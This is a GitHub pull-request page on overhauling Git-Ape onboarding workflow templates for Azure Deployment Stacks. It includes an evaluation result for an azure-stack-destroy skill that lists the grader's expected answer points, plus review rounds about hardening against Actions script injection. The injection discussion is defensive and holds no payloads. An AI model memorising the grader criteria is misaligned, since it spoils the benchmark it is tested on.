Positive — Local destroy of a Git-Ape deployment

Run 2/2 (failed):

  • answer_quality (0.00): fail: : Response recommends the azure-stack-destroy skill and destroy-stack.sh script (criterion 1 met), but fails criteria 2, 3, and 4: it does not reference state.json under .azure/deployments/deploy-20260506-001/ as the source of truth, does not name the az stack sub delete --action-on-unmanage deleteAll command/semantics, and does not mention az keyvault purge or explain the soft-delete purge sweep behavior for Key Vault name reuse.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.89): Prompt is trigger-aligned (score 0.89 >= 0.50)

Benchmark: azure-stack-destroy-eval | Skill: azure-stack-destroy | Model: gpt-5.3-codex

Results saved to: .waza-results/azure-stack-destroy-gpt-5.3-codex.json

🔢 Tokens (count + profile)

📊 azure-stack-destroy: 2,644 tokens (detailed ✓), 14 sections, 7 code blocks
   ⚠️  token count 2644 exceeds 1000

🎯 Quality (5-dim table)

DIMENSION          SCORE  FEEDBACK
────────────────────────────────────────────
clarity            █████  Instructions are exceptionally well-ordered: purpose is stated in the frontmatter description, prerequisites are tabulated, the procedure is numbered with concrete shell commands, and output examples show exactly what success looks like. The fast-vs-sync mode table is a particularly strong clarity aid.
completeness       █████  Edge cases are thoroughly covered — missing state.json, purge-protected vaults, out-of-sync stacks, subnet reference conflicts, already-destroyed stacks, and the fallback path when no stackId exists. The failure modes table with recovery steps leaves little room for an agent to get stuck.
trigger_precision  ████░  USE FOR and DO NOT USE FOR sections are well-defined with concrete phrases and scenarios; the 'Prefer this over raw az group delete' sub-section adds excellent disambiguation. Minor overlap: the 'When to Use' section partially restates USE FOR triggers, which is redundant and could cause confusion — consolidate into one section.
scope_coverage     █████  Scope is precisely bounded: subscription-scoped stacks created by Git-Ape only, with explicit exclusions for non-Git-Ape RGs, individual resource deletion, and non-Azure clouds. Capabilities (multi-RG, soft-delete purge, state update) and limitations (no surgical mode, no hand-written state.json) are both explicit.
anti_patterns      ████░  Avoids most anti-patterns well — no vague instructions, error handling is explicit, and directives don't conflict. One minor issue: the 'When to Use' section duplicates trigger phrases already in 'USE FOR', adding noise. Also, App Configuration / API Management / ML workspace purge being silently skipped (natural expiry) is documented but the agent has no guidance on whether to warn the user proactively about name-reuse delays for those types.
────────────────────────────────────────────
Overall: 4.6/5.0

A high-quality, production-grade skill definition. It is thorough, honest about limitations, and provides enough operational detail for an agent to succeed without human guidance in the common case. Minor improvements: consolidate the duplicate 'When to Use' and 'USE FOR' sections, and add a user-facing warning step for non-auto-purged soft-delete types (App Config, APIM, ML) to prevent silent name-reuse confusion.
✅ Check (compliance summary) (69 lines — click to expand)

ℹ️ waza check expects eval.yaml colocated with SKILL.md. This repo separates them into .github/evals/azure-stack-destroy/eval.yaml, so the "Evaluation Suite: Not Found" line below is a false negative — the eval actually ran (see the Score section above).

🔍 Skill Readiness Check
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Skill: azure-stack-destroy

📋 Compliance Score: Low
   ❌  Needs significant improvement. Description too short or missing triggers.

   Issues found:
   ❌  SKILL.md is 2644 tokens (hard limit 500)

📐 Spec Compliance: 7/9 checks passed
   ❌  Does not fully meet agentskills.io specification.
   ❌  [spec-allowed-fields] Unknown frontmatter fields: argument-hint, user-invocable
     📎  agentskills.io spec allows: name, description, license, allowed-tools, metadata, compatibility
   ❌  [spec-security] Security risks detected: description contains XML angle brackets
     📎  XML angle brackets and reserved prefixes pose injection and naming conflict risks

📎 Links: 0/4 valid
   ⚠️  4 link issue(s) found.
   ❌  [SKILL.md] → ../azure-stack-deploy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-stack-deploy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-drift-detector/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-resource-visualizer/SKILL.md: link escapes skill directory

📊 Token Budget: 2644 / 500 tokens
   ❌  Exceeds limit by 2144 tokens. Consider reducing content.

🧪 Evaluation Suite: Found
   ✅  eval.yaml detected. Run 'waza run eval.yaml' to test.

📐 Schema Validation: Passed
   ✅  eval.yaml schema valid
   ✅  5 task file(s) validated

💡 Advisory Checks
   ✅  [module-count] Found 0 reference module(s)
   ❌  [complexity] Complexity: comprehensive (2644 tokens, 0 modules)
   ✅  [negative-delta-risk] No negative delta risk patterns detected
   ✅  [procedural-content] Description contains procedural language
   ✅  [over-specificity] No over-specificity patterns detected
   ✅  [cross-model-density] Advisory 16: first sentence doesn't lead with action verb (reduces clarity)
   ❌  [body-structure] Advisory 17: body structure quality — no examples section found; no error handling or troubleshooting section found
   ✅  [progressive-disclosure] Content structure supports progressive disclosure
   ✅  [scope-reduction] Capability scope: 8 signal(s) detected (8 level-2 heading(s), 2 numbered procedure(s))

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📈 Overall Readiness
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  Your skill needs some work before submission.

🎯 Next Steps
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

To improve your skill:

1. Add a 'USE FOR:' section with 3-5 trigger phrases that activate the skill
2. Add a 'DO NOT USE FOR:' section to clarify when NOT to use this skill
3. Add routing clarity (e.g., **UTILITY SKILL**, INVOKES:, FOR SINGLE OPERATIONS:)
4. Run 'waza dev' for interactive compliance improvement
5. Fix spec violation [spec-allowed-fields]: Unknown frontmatter fields: argument-hint, user-invocable
6. Fix spec violation [spec-security]: Security risks detected: description contains XML angle brackets
7. Fix 4 link(s) that escape the skill directory
8. Reduce SKILL.md by 2144 tokens. Run 'waza tokens suggest' for optimization tips

Copy link
Copy Markdown
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Overhauls the /git-ape-onboarding flow: replaces the .exampleyml activation hack with a template-driven scaffolder under the skill directory, migrates deploy/destroy from az deployment sub to Azure Deployment Stacks (closes part of #30), registers the onboarding eval suite in the pilot tier, declares prompt files in the VSIX, and regenerates website docs.

Changes:

  • Removes .github/workflows/git-ape-{plan,deploy,destroy,verify}.exampleyml, ships canonical templates under .github/skills/git-ape-onboarding/templates/workflows/, plus scaffold-repo.{sh,ps1} and sync-templates.{sh,ps1} with a new git-ape-onboarding-template-check CI workflow enforcing parity.
  • Rewrites deploy + destroy templates around az stack sub create/delete --action-on-unmanage deleteAll, adds a state-file stackId/managedResources[] schema, a rollback step, a templateanalyzer staging workaround, and switches AZURE_SUBSCRIPTION_ID from secrets to vars.
  • Renames gpt-5-codexgpt-5.3-codex in tier manifest and bench prompts; registers git-ape-onboarding in the pilot tier with 4 tasks; tightens the agent's identity contract and adds a "required inputs" gate; declares .github/prompts/ in plugin.json and registers 9 chatPromptFiles; trims .vscodeignore.
Show a summary per file
File Description
.github/workflows/git-ape-onboarding-template-check.yml New CI parity check (bash+pwsh sync + scaffold byte-diff).
.github/workflows/git-ape-deploy.exampleyml (deleted) Old activation stub; superseded by template.
.github/skills/git-ape-onboarding/templates/workflows/git-ape-{plan,deploy,destroy,verify}.yml Canonical workflow templates; Stacks migration + scan staging + rollback.
.github/skills/git-ape-onboarding/templates/README.md + copilot-instructions.md Maintainer doc + canonical deployment standards.
.github/skills/git-ape-onboarding/scripts/{scaffold-repo,sync-templates}.{sh,ps1} Parity scaffold + mirror scripts.
.github/skills/git-ape-onboarding/SKILL.md, .github/agents/git-ape-onboarding.agent.md Drop acknowledgment phase, add invariants/identity/non-goals/required-inputs gate.
.github/copilot-instructions.md Stacks-based deploy/destroy guidance.
.github/evals/git-ape-onboarding/{eval,tasks/*}.yaml, .github/evals/manifest.yaml New eval suite (3 positive + 1 negative); register skill in pilot, rename codex model.
.github/prompts/{agent,skill}-bench.prompt.md Update default model list.
extension/package.template.json, extension/.vscodeignore, plugin.json Register prompt files in VSIX, drop dev-only .github/* paths from VSIX.
scripts/generate-docs.js, README.md, website/docs/** Regenerated docs for both repo CI and scaffolded user-facing workflows.

Copilot's findings

Comments suppressed due to low confidence (3)

.github/skills/git-ape-onboarding/templates/workflows/git-ape-verify.yml:44

  • The check now reads vars.AZURE_SUBSCRIPTION_ID (a repository variable), but the error message and summary still call it a "secret". This is misleading: a user looking at logs will go check repo Secrets, not repo Variables, and may waste time before realising the setup expects a variable. Update the user-facing messages and the missing-config copy to refer to AZURE_SUBSCRIPTION_ID as a variable. Also note git-ape-deploy.yml still writes subscription from vars.AZURE_SUBSCRIPTION_ID while the onboarding skill (Step 7) and copilot-instructions.md (line 405) still document AZURE_SUBSCRIPTION_ID as a secret — the docs and the workflow contract have diverged.
    .github/skills/git-ape-onboarding/templates/workflows/git-ape-verify.yml:121
  • The verify workflow checks for git-ape-ttl-reaper.yml, but the scaffold helper (scaffold-repo.sh / scaffold-repo.ps1) does not ship a TTL Reaper template — the MAPPINGS only include plan, deploy, destroy, verify, and drift.{md,lock.yml}. Every onboarded repo will therefore see a perpetual ⚠️ Git-Ape: TTL Reaper (git-ape-ttl-reaper.yml) — not found warning in Verify Setup. Either drop this entry from the workflow list, or add the TTL Reaper template to the scaffolder and the templates/workflows/ directory.
    .github/skills/git-ape-onboarding/templates/workflows/git-ape-destroy.yml:151
  • This gate accepts a state file as long as it has either stackId or deploymentId. Every state file ever written by this project has a deploymentId (it's the matrix key), so the check effectively only fails if state.json is corrupt. For a deployment created by the old (pre-Stacks) git-ape-deploy.exampleyml, stackId will be empty but deploymentId will be set — so the check passes, then az stack sub show --name "$STACK_NAME" in the next step returns a non-zero exit, the workflow records exists=false and exits 0 with "Already destroyed (stack not found)". Real Azure resources still exist, the resource group is never deleted, but the destroy run reports success and metadata.json will be flipped to destroyed. To make this Stacks-only and safe, require stackId explicitly (or, if you must accept old state files, fall back to az group delete on state.resourceGroup when stackId is empty).
  • Files reviewed: 47/47 changed files
  • Comments generated: 3

Comment on lines +607 to +609
STACK_ID='${{ steps.deploy.outputs.stack_id }}'
MANAGED='${{ steps.deploy.outputs.managed_resources }}'
MANAGED=${MANAGED:-[]}
Copy link
Copy Markdown
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed in d6b41dc. managed_resources and stack_id are now passed through env: and read as MANAGED="${MANAGED_RESOURCES:-[]}", then validated with jq empty (falling back to [] on invalid/empty JSON) before being consumed via jq --argjson managedResources. No more single-quoted JSON literal.

Comment on lines +288 to +302
# Also snapshot the previous template from git (parent commit of this merge
# or origin/main for /deploy comment). Used to redeploy last-known-good on failure.
DEPLOY_DIR="${{ steps.params.outputs.deploy_dir }}"
mkdir -p /tmp/rollback
if git show HEAD~1:"$DEPLOY_DIR/template.json" > /tmp/rollback/template.json 2>/dev/null; then
cp "$DEPLOY_DIR/parameters.json" /tmp/rollback/parameters.json 2>/dev/null || true
# Prefer the previous parameters if they exist at HEAD~1
git show HEAD~1:"$DEPLOY_DIR/parameters.json" > /tmp/rollback/parameters.json 2>/dev/null || true
echo "prior_template_available=true" >> "$GITHUB_OUTPUT"
echo "[$(date -u +%H:%M:%S)] Previous template captured from HEAD~1 → /tmp/rollback/"
echo " template bytes: $(wc -c < /tmp/rollback/template.json)"
else
echo "prior_template_available=false" >> "$GITHUB_OUTPUT"
echo "[$(date -u +%H:%M:%S)] No previous template in git history (first deployment)"
fi
Copy link
Copy Markdown
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed in d6b41dc. The rollback baseline is now derived per trigger: HEAD~1 only for push; for /deploy comments we git fetch origin main --depth=1 and use origin/main. git show "$BASELINE_REF:$DEPLOY_DIR/template.json" then reads the correct previous known-good template instead of the PR head.

Copy link
Copy Markdown
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Follow-up: the /deploy PR-comment trigger referenced above has since been removed entirely (unverifiable comment-author authorization). The rollback baseline is now derived solely from the push trigger — HEAD~1 on main after merge — so the origin/main fetch path for /deploy no longer exists.

Comment thread website/docs/workflows/git-ape-plan.md Outdated
Comment on lines +764 to +769
if (validationStatus === 'passed' && whatifResult) {
comment += `### What-If Analysis\n\n`;
comment += `\`\`\`\n${whatifResult}\n\`\`\`\n\n`;
} else if (whatifStatus === 'passed' && whatifResult) {
comment += `### What-If Analysis\n\n`;
comment += `\`\`\`\n${whatifResult}\n\`\`\`\n\n`;
Copy link
Copy Markdown
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed in d6b41dc. Removed the unreachable validationStatus === passed && whatifResult branch; what-if rendering is now driven uniformly by whatifStatus === passed && whatifResult.

Copy link
Copy Markdown
Contributor

@sendtoshailesh sendtoshailesh left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the substantial cleanup here — moving the onboarding scaffolds out of .github/workflows/, adding sync/parity tooling, and wiring prompt/eval registration all make sense. I also like the skip-on-collision behavior in the scaffolders and the explicit docs refresh.

I did find a few blocking issues that should be fixed before merge:

  1. Command injection in manual destroy path (.github/skills/git-ape-onboarding/templates/workflows/git-ape-destroy.yml, around lines 55-66)
    inputs.confirm and inputs.deployment_id are interpolated directly into a run: script via ${{ ... }}. Because Actions expands those expressions before bash parses the script, a crafted workflow_dispatch input can inject arbitrary shell. Please pass these values through env: (or another non-shell-interpolated channel) and read them from normal shell variables instead.

  2. Unsafe direct interpolation of github.base_ref into shell (.github/skills/git-ape-onboarding/templates/workflows/git-ape-plan.yml:44)
    github.base_ref is used directly inside the git diff command in a run: block. Per GitHub’s Actions hardening guidance, attacker-controlled context values should not be embedded into shell scripts this way. This should also be routed through env: and quoted normally in bash.

  3. Rollback source is wrong for /deploy runs (.github/skills/git-ape-onboarding/templates/workflows/git-ape-deploy.yml, around lines 219-228 and 475-486)
    The comment says the workflow should snapshot the parent commit or origin/main for /deploy comments, but the implementation always reads HEAD~1. On comment-triggered deploys that means rollback can redeploy an earlier PR commit that was never the last known-good state, instead of rolling back to main. That is especially risky on multi-commit PRs. Please branch this logic so /deploy captures from origin/main (or another authoritative deployed baseline) before using it for rollback.

One additional hardening nit: git-ape-verify.yml also embeds secret values directly into shell conditionals (${{ secrets.AZURE_CLIENT_ID }} etc.). I would strongly prefer converting those checks to env booleans/variables as well.

Once the injection issues and rollback baseline are fixed, I’d be happy to re-review.

arnaudlh added 2 commits June 4, 2026 10:19
Address PR review on the git-ape-onboarding workflow templates:

- Route attacker-controllable inputs (github.base_ref, workflow_dispatch
  inputs, JSON step outputs) through env: and read them as quoted shell
  variables to close script-injection vectors (plan, destroy).
- plan: compute the PR diff against origin/$BASE_REF instead of an
  unsanitised interpolation.
- deploy: derive the rollback baseline from HEAD~1 (push) or origin/main
  (/deploy comment); pass stack_id/managed_resources via env and validate
  the managed_resources JSON before jq consumes it.
- destroy: make teardown Deployment-Stacks-only with a guarded legacy
  resource-group fallback; emit explicit legacy/fallback_rg outputs.
- verify: gate required secrets/variable via env booleans; check the
  AZURE_SUBSCRIPTION_ID variable; align the scaffolded WORKFLOWS list with
  the scaffolder (drop ttl-reaper, add verify, use drift.lock.yml).
- plan: remove the unreachable what-if render branch.

Regenerate website workflow docs.
AZURE_SUBSCRIPTION_ID is consumed via vars. in every scaffolded workflow, so
document it as a GitHub repository/environment variable (not a secret).
AZURE_CLIENT_ID and AZURE_TENANT_ID remain secrets. Fix the OIDC snippet in
both copilot-instructions templates to use vars.AZURE_SUBSCRIPTION_ID.
@github-actions
Copy link
Copy Markdown
Contributor

github-actions Bot commented Jun 4, 2026

⚠️ Documentation Staleness Warning

Source files (agents, skills, workflows, or config) changed in this PR, but the generated documentation is out of date.

Changed docs that need regeneration:

  • website/docs/workflows/git-ape-release.md

To fix: Run the following command and commit the results:

node scripts/generate-docs.js

This is an advisory check — it does not block the PR.

@arnaudlh
Copy link
Copy Markdown
Member Author

arnaudlh commented Jun 4, 2026

Thanks for the thorough review, @sendtoshailesh. All four points are addressed in d6b41dc (workflow templates) and 67005a7 (docs). Summary:

1. Command injection in manual destroy path (git-ape-destroy.yml)
workflow_dispatch inputs are no longer interpolated into the script. The "Find destroy-requested deployments" step now exposes EVENT_NAME / INPUT_CONFIRM / INPUT_DEPLOYMENT_ID via env: and builds the id array with jq -n -c --arg id "$INPUT_DEPLOYMENT_ID" '[$id]', so nothing attacker-controllable reaches the shell unquoted.

2. Unsafe interpolation of github.base_ref (git-ape-plan.yml)
The "Find deployment directories with changes" step now sets env: BASE_REF: ${{ github.base_ref }} and computes the diff with git diff --name-only "origin/${BASE_REF}...HEAD", quoting the value normally.

3. Rollback baseline wrong for /deploy runs (git-ape-deploy.yml)
The "Capture pre-deploy state" step now branches on the trigger: HEAD~1 for push, and for /deploy comments it does git fetch origin main --depth=1 and uses BASELINE_REF="origin/main", then git show "$BASELINE_REF:$DEPLOY_DIR/template.json". Multi-commit PRs no longer roll back to an arbitrary earlier PR commit.

Hardening nit — git-ape-verify.yml secret conditionals
Converted to env: booleans: HAS_CLIENT_ID: ${{ secrets.AZURE_CLIENT_ID != '' }} (and tenant), with HAS_SUBSCRIPTION_ID: ${{ vars.AZURE_SUBSCRIPTION_ID != '' }}; the checks now test [[ "$HAS_*" != "true" ]]. The "Verify Azure access" step reads AZURE_CLIENT_ID from env: too.

While in here I also addressed the Copilot review threads (managed_resources JSON via env: + jq validation, the rollback HEAD~1 overlap, and an unreachable what-if render branch), made git-ape-destroy Deployment-Stacks-only with a guarded legacy resource-group fallback, aligned the verify scaffold list with the scaffolder (dropped ttl-reaper, added verify, switched to drift.lock.yml), and reconciled AZURE_SUBSCRIPTION_ID as a GitHub variable (it is consumed via vars. in every scaffolded workflow) across the docs and OIDC snippets.

Ready for re-review.

@arnaudlh arnaudlh requested a review from sendtoshailesh June 4, 2026 02:52
Copy link
Copy Markdown
Contributor

@sendtoshailesh sendtoshailesh left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Follow-up review:

Previously raised issues:

  • ✅ Fixed: git-ape-destroy.yml no longer interpolates inputs.* directly into shell; the workflow_dispatch inputs are routed via env and JSON-encoded with jq before use.
  • ✅ Fixed: git-ape-plan.yml no longer inlines ${{ github.base_ref }} in the shell; it is passed through env.BASE_REF first.
  • ✅ Fixed: git-ape-deploy.yml now uses origin/main for /deploy rollback baselines instead of always assuming HEAD~1; the push path still uses HEAD~1, which is the previous main commit after merge.
  • ✅ Fixed: git-ape-verify.yml moved the secret checks to env booleans instead of embedding ${{ secrets.* }} directly in shell conditionals.

New issues found:

  • ❌ Blocking: matrix.deployment_id is still derived from attacker-controlled deployment directory names and interpolated directly into run: blocks / JS string literals in the plan, deploy, and destroy templates. That reintroduces shell / script injection via paths under .azure/deployments/*/.
  • ⚠️ Non-blocking: the /deploy comment path checks approval state, but it still does not verify that the commenter is an authorized collaborator/member before triggering deployment.
  • ⚠️ Non-blocking: both deploy and destroy still swallow git push failures after updating state.json / metadata.json, which can leave Azure state changed without the repo state being persisted.

Overall verdict: the original blockers are resolved, but the new matrix.deployment_id injection path is still a release-blocking security issue, so this PR is not merge-ready yet.

arnaudlh added 3 commits June 4, 2026 19:10
…t_id injection

matrix.deployment_id is derived from attacker-controllable .azure/deployments/*/ directory names and was interpolated directly into run: bash blocks and github-script JS string literals across the plan, deploy, and destroy workflow templates.

Route it through job-level env (DEPLOYMENT_ID) so run blocks reference $DEPLOYMENT_ID and github-script reads process.env.DEPLOYMENT_ID, and reject any directory name outside ^[A-Za-z0-9._-]+$ at the detect step (defense in depth, also makes derived deploy_dir provably safe).
…e push

The /deploy comment trigger cannot reliably verify the commenter's
authorization, so deployment is now gated solely on merge to main (which
already requires PR review + approval via branch protection). Removes the
issue_comment trigger, the check-comment-trigger job, and all PR-head-ref
checkout paths. Also fails loud (exit 1) instead of swallowing git push
failures when committing deployment/teardown state back to main.
@arnaudlh arnaudlh requested a review from sendtoshailesh June 4, 2026 11:20
Copy link
Copy Markdown
Contributor

@sendtoshailesh sendtoshailesh left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Follow-up review:

Previously raised issues:

  • ✅ Fixed: matrix.deployment_id is now validated against ^[A-Za-z0-9._-]+$ before entering the matrix and routed through env.DEPLOYMENT_ID / process.env.DEPLOYMENT_ID in the plan, deploy, and destroy templates, so the earlier matrix.deployment_id shell/JS injection path is closed.
  • ✅ Fixed: the /deploy comment path is gone entirely from git-ape-deploy.yml, so there is no longer an unauthenticated comment-triggered deployment path to authorize.
  • ✅ Fixed: deploy and destroy now fail the workflow if the post-state git push fails instead of silently swallowing that error.

New issues found:

  • ❌ Blocking: untrusted values read from parameters.json are still interpolated directly into run: scripts via ${{ ... }} in the workflow templates, which reintroduces the same GitHub Actions expression-to-shell injection class under a different input. Examples: git-ape-plan.yml uses ${{ steps.params.outputs.location }} in shell at lines 157, 414, and 455; git-ape-deploy.yml uses ${{ steps.params.outputs.location }}, ${{ steps.params.outputs.project }}, and ${{ steps.params.outputs.environment }} in shell/JQ argument positions at lines 175, 178, 241, 244-245, 258, 420, and 498-500. These values come from attacker-controlled PR content (parameters.json) and need the same treatment as deployment_id: validate if needed, pass through env:, and reference normal shell variables instead of inlining ${{ ... }} into script source.
  • ⚠️ Non-blocking: git-ape-plan.yml still tells reviewers to comment /deploy (Plan Comment step, line 738), but that trigger has been intentionally removed. The PR guidance should be updated to avoid instructing users to use a nonexistent path.

Overall verdict:
The previously raised issues are resolved, but the new ${{ steps.params.outputs.* }} injection path is still a release-blocking security issue, so this PR is not merge-ready yet.

…ection

Untrusted location/project/environment values read from parameters.json
were interpolated directly into run: script bodies via ${{ steps.params.outputs.* }},
the same expression-to-shell injection class already fixed for deployment_id.
Route them through step-level env: blocks and reference $LOCATION/$PROJECT/$ENVIRONMENT
shell variables instead. Also drop the stale /deploy reviewer instruction in
git-ape-plan.yml (that trigger was removed). Regenerated workflow docs.
@arnaudlh
Copy link
Copy Markdown
Member Author

arnaudlh commented Jun 4, 2026

@sendtoshailesh Thanks for the thorough re-review. Fixed the remaining injection in dce5833e.

Blocking item — ${{ steps.params.outputs.* }} in run: bodies: location, project, and environment are read from parameters.json (attacker-controllable) and were being interpolated directly into shell/jq script bodies — the same expression-to-shell injection class as the earlier deployment_id finding. They are now routed through step-level env: blocks and referenced as "$LOCATION" / "$PROJECT" / "$ENVIRONMENT" shell variables in both git-ape-deploy.yml (validate, deploy, rollback, and save-state steps) and git-ape-plan.yml (cost, validate, what-if steps). No untrusted value is inlined into a run: body anymore. (deploy_dir is left as-is since it is derived solely from the already-validated $DEPLOYMENT_ID and contains no shell metacharacters.)

Non-blocking item — stale /deploy instruction: removed the 3. Or comment /deploy line from the Plan Comment step in git-ape-plan.yml; merge-to-deploy is the only trigger now.

actionlint (with embedded shellcheck) reports no injection findings on either template — only pre-existing SC2129 redirect-style suggestions unrelated to this change. Workflow docs regenerated from the templates.

@arnaudlh arnaudlh requested a review from sendtoshailesh June 4, 2026 11:30
arnaudlh added 3 commits June 4, 2026 19:38
…rhaul

# Conflicts:
#	.github/agents/git-ape.agent.md
#	.github/copilot-instructions.md
#	.github/evals/manifest.yaml
#	.github/workflows/git-ape-deploy.exampleyml
#	.github/workflows/git-ape-destroy.exampleyml
#	website/docs/agents/git-ape.md
#	website/docs/workflows/git-ape-deploy.md
#	website/docs/workflows/git-ape-destroy.md
Merge resolution updated the .github/copilot-instructions.md mirror to the
stack-based deployment flow (dropping the /deploy trigger). Propagate the
same content to the canonical templates/copilot-instructions.md so the
onboarding template-check (bash + pwsh) passes.
Regenerated from sources updated by the upstream/main merge (azure-resource-deployer
and azure-template-generator agents now delegate to skills; lock workflow metadata).
Copy link
Copy Markdown
Contributor

@sendtoshailesh sendtoshailesh left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Round 4 follow-up review:

Previously raised issues:

  • ✅ Fixed: untrusted parameters.json values (location, project, environment) are now routed through env: before use in shell steps instead of being interpolated directly into run: blocks.
  • ✅ Fixed: the stale /deploy reference was removed from the plan comment path.

Conflict resolution assessment:

  • ✅ Merge resolution looks clean overall. I did not find conflict markers or accidental duplicate sections in the changed templates/workflows, the key workflow YAML files parse successfully, and the onboarding template sync check passes.

New issues found:

  • ❌ Blocking: website/docs/getting-started/onboarding.md still tells users to configure AZURE_SUBSCRIPTION_ID as a GitHub secret (gh secret set at lines 364-366, 383-391), but the scaffolded workflows and verify flow now read it from vars.AZURE_SUBSCRIPTION_ID as a variable. A user following the updated onboarding docs will end up with a broken setup: verify/deploy read from vars, but the docs populate secrets. Given this PR is specifically overhauling onboarding/scaffolding, that documentation contract needs to be consistent before merge.
  • ⚠️ Non-blocking: git-ape-verify.yml and its generated docs still say Merge or comment /deploy to deploy, and the summary still says secret(s) missing even though one of the required values is now a variable. That guidance is stale/misleading, though the actual deploy trigger removal in plan/deploy is correct.

Overall verdict:
The round-3 blockers are fixed and the merge conflict resolution looks solid, but the onboarding docs still misconfigure AZURE_SUBSCRIPTION_ID, so I don’t think this is merge-ready yet. Once the docs/template guidance are aligned with the new variable-based contract, I’d be happy to re-review.

Round 4 review (sendtoshailesh):

- Blocking: onboarding docs configured AZURE_SUBSCRIPTION_ID via 'gh secret set',
  but the scaffolded plan/deploy/destroy/verify workflows read it from
  vars.AZURE_SUBSCRIPTION_ID. Switch the single- and multi-environment setup
  steps to 'gh variable set' so the documented contract matches the workflows.
  AZURE_CLIENT_ID and AZURE_TENANT_ID remain secrets.
- Non-blocking: git-ape-verify.yml summary said 'secret(s) missing' (one value
  is now a variable) and 'Merge or comment /deploy to deploy' (the /deploy
  trigger was removed). Reworded to 'required value(s) missing' and
  'Merge to main to deploy'; renamed the check step accordingly.

Regenerated git-ape-verify.md from the updated template.
@arnaudlh
Copy link
Copy Markdown
Member Author

arnaudlh commented Jun 5, 2026

@sendtoshailesh Thanks for the round 4 review. Both points addressed in de50e714.

Blocking — AZURE_SUBSCRIPTION_ID documented as a secret: website/docs/getting-started/onboarding.md now sets it via gh variable set (single- and multi-environment paths, including the azure-destroy environment), matching the scaffolded plan/deploy/destroy/verify workflows that read vars.AZURE_SUBSCRIPTION_ID. AZURE_CLIENT_ID and AZURE_TENANT_ID remain secrets. The "Set secrets" heading and intro now state explicitly which value is a secret vs. a variable.

Non-blocking — stale git-ape-verify.yml guidance: the summary line now reads required value(s) missing instead of secret(s) missing, the next-steps line reads Merge to main to deploy (the /deploy trigger is gone), and the check step is renamed to Check required secrets and variables. Regenerated git-ape-verify.md from the template.

The template ↔ mirror sync check passes locally for both bash and pwsh.

Copy link
Copy Markdown
Contributor

@sendtoshailesh sendtoshailesh left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Round 5 follow-up review:

Verified fixes from round 4:

  • website/docs/getting-started/onboarding.md now treats AZURE_SUBSCRIPTION_ID as a GitHub variable (gh variable set ...) rather than a secret.
  • git-ape-verify and its generated docs no longer mention /deploy, and the summary wording is now required value(s) missing.

One issue still remains in the current diff:

  • .github/agents/azure-resource-deployer.agent.md:78, website/docs/agents/azure-resource-deployer.md:103, and website/docs/use-cases/cicd-pipeline.md:100 still show subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}. That is now inconsistent with the onboarding/scaffolded workflow contract, which uses vars.AZURE_SUBSCRIPTION_ID (for example in .github/copilot-instructions.md and the generated workflow templates). Because these docs/agent definitions are part of this PR, they should be updated to the variable-based form before merge.

…workflows

Round 5 review (sendtoshailesh): the azure-resource-deployer agent definition
and the cicd-pipeline / drift-detection example workflows still passed
subscription-id from secrets.AZURE_SUBSCRIPTION_ID, contradicting the
variable-based contract used by the scaffolded workflows and copilot-instructions
(vars.AZURE_SUBSCRIPTION_ID).

Switch all three azure/login@v2 examples to vars.AZURE_SUBSCRIPTION_ID
(client-id and tenant-id remain secrets). Regenerated the agent doc from source.
@arnaudlh
Copy link
Copy Markdown
Member Author

arnaudlh commented Jun 8, 2026

@sendtoshailesh Round 5 issue fixed in 8c1ca1bc.

All three azure/login@v2 examples now read subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}, matching the scaffolded workflows and .github/copilot-instructions.md:

  • .github/agents/azure-resource-deployer.agent.md:78 (source) → regenerated website/docs/agents/azure-resource-deployer.md:103
  • website/docs/use-cases/cicd-pipeline.md:100
  • website/docs/deployment/drift-detection.md:423

client-id and tenant-id remain secrets.*.

I also swept the whole repo: a repo-wide grep confirms zero remaining secrets.AZURE_SUBSCRIPTION_ID references — every read is now vars.AZURE_SUBSCRIPTION_ID and every setup uses gh variable set. The template ↔ mirror sync check passes (bash + pwsh), docs regenerated, and no conflict markers remain in the tree.

Ready for re-review.

@arnaudlh arnaudlh requested a review from sendtoshailesh June 8, 2026 09:23
Copy link
Copy Markdown
Contributor

@sendtoshailesh sendtoshailesh left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Round 6 follow-up: new commits were pushed after the previous requested-changes review, and the remaining round-5 blocker is now resolved.

Across rounds 1-4, the earlier issues had already been fixed. In round 5, the only outstanding blocker was the inconsistent use of secrets.AZURE_SUBSCRIPTION_ID in three docs/agent examples. I re-checked the updated PR and confirmed those references now use vars.AZURE_SUBSCRIPTION_ID in:

  • .github/agents/azure-resource-deployer.agent.md
  • website/docs/agents/azure-resource-deployer.md
  • website/docs/use-cases/cicd-pipeline.md

I also searched the full current PR diff for any remaining secrets.AZURE_SUBSCRIPTION_ID references and found only removed lines, with the live additions consistently using vars.AZURE_SUBSCRIPTION_ID. I did a fresh scan of the current diff as well and did not find any new issues.

All issues raised across all six review rounds are now resolved. Approving.

@arnaudlh arnaudlh merged commit d1bf697 into main Jun 8, 2026
32 checks passed
@arnaudlh arnaudlh deleted the feat/onboarding-overhaul branch June 8, 2026 10:36
